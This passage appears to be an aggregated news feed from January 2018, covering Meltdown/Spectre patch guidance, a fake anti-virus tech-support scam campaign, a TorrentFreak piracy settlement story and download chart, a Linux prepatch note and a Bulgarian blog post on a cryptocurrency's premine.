On the contrary, pay special attention to impact of patches: there are known cases where AV programs caused BSOD on systems with the patch. This is actually a reason why Microsoft added a check for a registry key that needs to be set by the AV program to indicate that it’s compatible with the patch: if the key is not present, the patch will not be installed!
If you are installing the patch on a Windows server: be aware that besides installing the patch, a registry key needs to be added manually to enable it: https://support.microsoft.com/en-us/help/4072698/windows-server-guidance-to-protect-against-the-speculative-execution
Without this registry key nothing will happen. Microsoft presumably added this because on servers, impact to performance might be higher (so it’s up to you to take the risk … or not). Test, test, test.
The good thing with this approach is that, once you install the patch and enable the mitigations: if your system blows up you can change the registry keys and disable the mitigations. This will allow you to try out the patch. As I said: test, test, test.
Update 1: fellow handler Didier Stevens did some tests of patches on the Windows platform – as you can see on the screenshot below, the patch for the Spectre vulnerability (CVE-2017-5715) requires a firmware (microcode) update as well.
This means that, if there is no firmware update for your platform, that the patch is useless currently.
Update 3: CPU firmware (microcode updates) can certainly be delivered by the OS vendors, and there have been such cases in the past. This makes it much better for the end-users, since a BIOS update will not be required.
However, there is a down side with this approach: such microcode updates are lost when the CPU is reset or powered down. It means that they need to be applied every time the system boots up. Still, it's a viable solution.
Checking the released updates so far, it appears that RedHat, for example, has included certain microcode updates in their patches (although for only several CPU families it seems). Microsoft, on the other hand, has not done so (who knows why, and whether they will do it).
Update 1/8/2018: Some vendors have already released BIOS updates that mitigate the mentioned issues, so check their web pages (I have verified that Lenovo has released BIOS updates, and successfully installed them).
Finally, we have yet to see what other impacts these (huge) changes will have, besides reducing performance. For example, it appears that the patches will impact ability to capture RAM contents, which might further impact various forensics activities.
We are carefully monitoring everything around these vulnerabilities and will, as always, try to be your source of clear and precise information.
If you have something to add, please contact us here – especially if there are errors in the diary (or post a comment).
Some predictions for 2018
Some predictions for 2018: 1. Major malware(s) spreading via Intel ME and the like. Significantly worse than wannacry. Possibly hard to clean, requiring reprogramming chip on external device. 2. Major Android malware(s). 3. m$ windows will suck so much, computer illiterate people will be ready to pay for just literally "uninstalling windows" 4. bitcoin will at least temporary lose the first place on https://coinmarketcap.com (this is not rigorous metric)
Tourist Scams
A comprehensive list. Most are old and obvious, but there are some clever variants.
Sky Hits Man With £5k ‘Fine’ For Pirating Boxing on Facebook
When people download content online using BitTorrent, they also distribute that content to others. This unlawful distribution attracts negative attention from rightsholders, who have sued hundreds of thousands of individuals worldwide.
Streaming is considered a much safer method to obtain content, since it’s difficult for content owners to track downloaders. However, the same can’t be said about those who stream content to the web for the benefit of others, as an interesting case in the UK has just revealed.
It involves 34-year-old Craig Foster who received several scary letters from lawyers representing broadcaster Sky. The company alleged that during last April’s bout between Anthony Joshua’s and Wladimir Klitschko, Foster live-streamed the multiple world title fight on Facebook Live.
Financially, this was a major problem for Sky, law firm Foot Anstey LLP told Foster. According to their calculations, at least 4,250 people watched the stream without paying Sky Box Office the going rate of £19.95 each. Tapped into Sky’s computers, the broadcaster concluded that Foster owed the company £85,000.
But according to The Mirror, father-of-one Foster wasn’t actually to blame.
“I’d paid for the boxing, it wasn’t like I was making any money. My iPad was signed in to my Facebook account and my friend just started streaming the fight. I didn’t think anything of it, then a few days later they cut my subscription,” Foster said.
“They’re demanding the names and addresses of all my mates who were round that night but I’m not going to give them up. I said I’d take the rap.”
While Foster says he won’t turn in the culprit, there’s no doubt that the fight stream originated from his Sky account. The TV giant embeds watermarks in its broadcasts which enables it to see who paid for an event, should a copy of one turn up on the Internet.
As we reported last year following the Mayweather v McGregor super-fight, the codes are clearly visible with the naked eye.
While taking the rap for someone else’s infringing behavior isn’t something anyone should do lightly, it appears that Scarborough-based Foster did just that.
According to Neil Parkes, who specializes in media litigation, content protection and contentious IP at Foot Anstey, Foster accepted responsibility and agreed to pay a settlement.
“Mr Foster broke the law,” Parkes said. “He has acknowledged his wrongdoing, apologised and signed a legally binding agreement to pay a sum of £5,000 to Sky.”
The Mirror, however, has Foster backtracking. He says he wasn’t given enough time to consider his position and now wants to fight Sky in court.
“It’s heavy-handed. I’ve apologized and told them we were drunk,” Foster said.
“I know streaming the fight was wrong. I didn’t stop my friend but I was watching the boxing. I’m just a bloke who had a few drinks with his friends.”
Unless he can find a law firm willing to fight his corner at a hugely cut-down rate, Foster will find this kind of legal fisticuffs to be a massively expensive proposition, one in which he will start out as the clear underdog.
Not only was Foster’s Sky account the originating source, both his iPad and his Facebook account were used to stream the fight. On top of what appears to be a signed confession, he also promised not to do anything else like this in future. Furthermore, he even agreed to issue an apology that Sky can use in future anti-piracy messages.
Of course, Foster might indeed be a noble gentleman but he should be aware that as a civil matter, this fight would be decided on the balance of probabilities, not beyond reasonable doubt. If the judge decides 51% in Sky’s favor, he suffers a knockout along with a huge financial headache.
No one wants a £5,000 bill but that’s a drop in the ocean compared to the cost implications of losing this case.
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
Top 10 Most Pirated Movies of The Week on BitTorrent – 01/08/18
This week we have two newcomers in our chart.
Blade Runner 2049 is the most downloaded movie again.
The data for our weekly download chart is estimated by TorrentFreak, and is for informational and educational reference only. All the movies in the list are Web-DL/Webrip/HDRip/BDrip/DVDrip unless stated otherwise.
RSS feed for the weekly movie download chart.
This week’s most downloaded movies are:
| Movie Rank | Rank last week | Movie name | IMDb Rating / Trailer |
|---|---|---|---|
| Most downloaded movies via torrents | |||
| 1 | (1) | Blade Runner 2049 | 8.9 / trailer |
| 2 | (10) | Coco (HDTS/DVDscr) | 8.9 / trailer |
| 3 | (2) | Justice League | 7.1 / trailer |
| 4 | (…) | Jumanji: Welcome to the Jungle | 7.3 / trailer |
| 5 | (3) | Bright | 6.7 / trailer |
| 6 | (8) | The Foreigner | 7.2 / trailer |
| 7 | (5) | Dunkirk | 8.3 / trailer |
| 8 | (9) | It | 7.6 / trailer |
| 9 | (…) | Renegades | 5.5 / trailer |
| 10 | (6) | Kingsman: The Golden Circle | 7.2 / trailer |
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
Fake anti-virus pages popping up like weeds, (Mon, Jan 8th)
Introduction
With recent media coverage on Meltdown and Spectre, many other security issues get buried in the mix. One such issue I've run across for many months now is fake anti-virus (AV) web pages or other unwanted destinations that pop up after viewing a legitimate, but compromised, website.
Shown above: Flow chart for this activity.
Last week, with the help of @baberpervez2, I found several compromised sites leading to these fake AV pages and other unwanted destinations. They all had the same characteristics, and I documented how these compromised sites could be found through Google (link). However, that particular campaign isn't the only one pushing fake AV pages. I've run across at least one other campaign, which I've documented in this diary.
Details
Below is an example of a fake AV page as seen on a Windows host using Google Chrome. When I used Internet Explorer, I could not close the popup notifications (they just reappeared), and the browser window would not close unless I killed the process using Task Manager. This is a social engineering scheme to trick people into calling a fake tech support phone number. Once you call the number, a fake support technician will walk you through several steps to supposedly fix your computer. Eventually, you'll be asked for a credit card number to pay for this service.
Shown above: Example of a fake AV page as seen in Google Chrome.
Judging by the amount of fake AV pages I've come across over the past few months, this type of tech support scam is increasingly popular. It relies on a large pool of potential victims world-wide. IT professionals may scoff at these attempts, but using a computer is a lot like driving a car. Most people can effectively drive a car without fully knowing how it works. The same is true for most computer users. Our culture of computer use creates a ready pool of potential victims for this sort of scam.
Another key component for these campaigns is the availability of countless servers world-wide that can be compromised. Server administration is a continual job that involves frequent patching and software updates. It is incredibly easy for legitimate websites to fall behind in their security-related patches. Such servers are often compromised and used for this activity.
From these compromised sites, we see injected script that leads to a fake AV page or some other unwanted destination. What does the injected script look like? I've highlighted an example in the image below.
Shown above: An example of injected script from this campaign.
In the image above, the injected script ends with a call to a .tk domain that, in turn, leads to another .tk domain for the fake AV page. These domains frequently change, so blocking one of them is only effective for about an hour or so. These new domains usually change only a few characters from the previous ones.
Below is an example of the traffic filtered in Wireshark. This shows the compromised site, the first .tk domain, and the second .tk domain hosting a fake AV page. The fake AV page has several HTTP GET requests for associated images and other items.
Shown above: An example of the traffic filtered in Wireshark.
Final words
An example of the traffic for the above fake AV activity can be found here. This is not an isolated incident, and I expect we'll see more fake AV pages and associated tech support scams in 2018. Although we'll continue to see actual malware, I believe it will remain just as (if not more) profitable for criminals to social engineer victims into providing access to their computers and credit card information.
---
Brad Duncan
brad [at] malware-traffic-analysis.net
Kernel prepatch 4.15-rc7 Linus has released the 4.15-rc7 kernel prepatch. "Ok, we had an interesting week, and by now everybody knows why we were merging all those odd x86 page table isolation patches without following all of the normal release timing rules. But rc7 itself is actually pretty calm. "
ISC Stormcast For Monday, January 8th 2018 https://isc.sans.edu/podcastdetail.html?id=5815, (Mon, Jan 8th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
За левкойна и етиката
Наскоро ми попадна новината за създаването на нова криптовалута – левкойн.
Посмях се. Неведнъж съм мислил да направя и аз една криптовалута – не повече от ден работа е. Винаги ме е спирал въпросът с какво тя ще бъде полезна, нова и необходима, което да я различава от наличните вече. Не съм успял да измисля разлика, която да си струва труда.
Дали това криптовалутата да е българска си го струва? Съмнявам се – българите чудесно могат да ползват съществуващите наднационални криптовалути. Но пък и не пречи. Все пак има хора, които се определят първо като българи, пък после като всичко останало (ако има какво). Така че защо не? Браво на Добри Божилов, ще е от полза за някого.
След това обаче метнах поглед на кода ѝ. И на блокчейна ѝ. И се почесах по главата.
Знаете, че Биткойн ще стигне до максимум 21 милиона монети, нали? По същия начин, левкойнът ще стигне до максимум 9 милиона монети. Дотук – добре, това не е толкова важно.
Важното и интересно за мен се оказа, че 1 милион от тези монети са „предварително изкопани“. От създателя на валутата, за лично ползване.
И това не е задъжително престъпление. Сатоши Накамото също се е оказал с почти 1 милион биткойна. Създателите на Етереум и много други валути също са заделили някакъв дял за себе си.
Скандален според мен е запазеният процент монети – към 11% от всички възможни. Директно и по начало. Сатоши Накамото е натрупал биткойните си, докато сам е копаел да поддържа блокчейна, чакайки други хора да се убедят и присъединят. Девелоперите на Етереум запазиха за себе си несравнимо по-малък процент, а създадоха умни договори и какви ли не още възможности. Да запазиш за себе си над 10% от цялото възможно количество криптовалута, понеже си си дал 1 ден лесен за всеки програмист труд, е най-безогледната лакомия и липса на етика, която съм виждал. (Може би с изключение на екипа на Рипъл – те са запазили за себе си даже повече. Което обуславя мнението ми за тази валута.)
Ако впрегна да копаят тази валута сървърите, които контролирам, най-вероятно ще отхапя солидно парче от баницата на левкойна. Но етиката около него ме погнусява до степен да ми приседне това парче. Нямам нищо против да съм богат – но не на такава цена.
(А мога и много повече. Мога за буквално ден да направя криптовалута за примерно еколози. За любители на фантастика. За подкрепа на развитието на изкуствения интелект. Хомеопатична, с благотворни биоенергийни ултрачервени излъчвания, от сто процента рециклирани електрони… Тогава най-вероятно ще се окажа с много повече пари, ако запазя за себе си дори по-малък процент.)
Мислете за мен каквото щете. Луд ли съм? Лудите, лудите – те да са живи.
January 07, 2018
Comic for January 07, 2018 Dilbert readers - Please visit Dilbert.com to read this feature. Due to changes with our feeds, we are now making this RSS feed a link to Dilbert.com.